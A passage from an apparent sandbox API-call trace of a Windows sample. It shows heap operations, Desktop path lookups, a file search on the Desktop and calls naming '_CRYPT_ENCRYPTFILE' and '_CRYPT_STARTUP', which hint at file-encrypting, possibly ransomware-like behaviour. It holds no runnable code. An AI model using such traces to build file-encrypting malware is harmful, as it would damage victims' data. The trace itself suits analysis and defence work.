cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YmoA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="moA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oA5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0147.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5t.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0147.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0147.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0147.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0147.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0147.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0147.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0147.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0147.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0147.329] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0147.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0147.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0147.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0147.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0147.330] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0147.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0147.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0147.331] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0147.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0147.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0147.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0147.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0147.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0147.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0147.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0147.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0147.333] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0147.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0147.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0147.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0147.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0147.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0147.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0147.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0147.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0147.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0147.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0147.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0147.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0147.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0147.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0147.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.445] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E-SkW-EYmoA5t.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e179da0, ftCreationTime.dwHighDateTime=0x1d5f0a1, ftLastAccessTime.dwLowDateTime=0x8cef6890, ftLastAccessTime.dwHighDateTime=0x1d5ee42, ftLastWriteTime.dwLowDateTime=0x8cef6890, ftLastWriteTime.dwHighDateTime=0x1d5ee42, nFileSizeHigh=0x0, nFileSizeLow=0x6d89, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="E-SkW-EYmoA5t.bmp", cAlternateFileName="E-SKW-~1.BMP")) returned 0xa87410 [0147.446] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0147.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.447] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0147.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 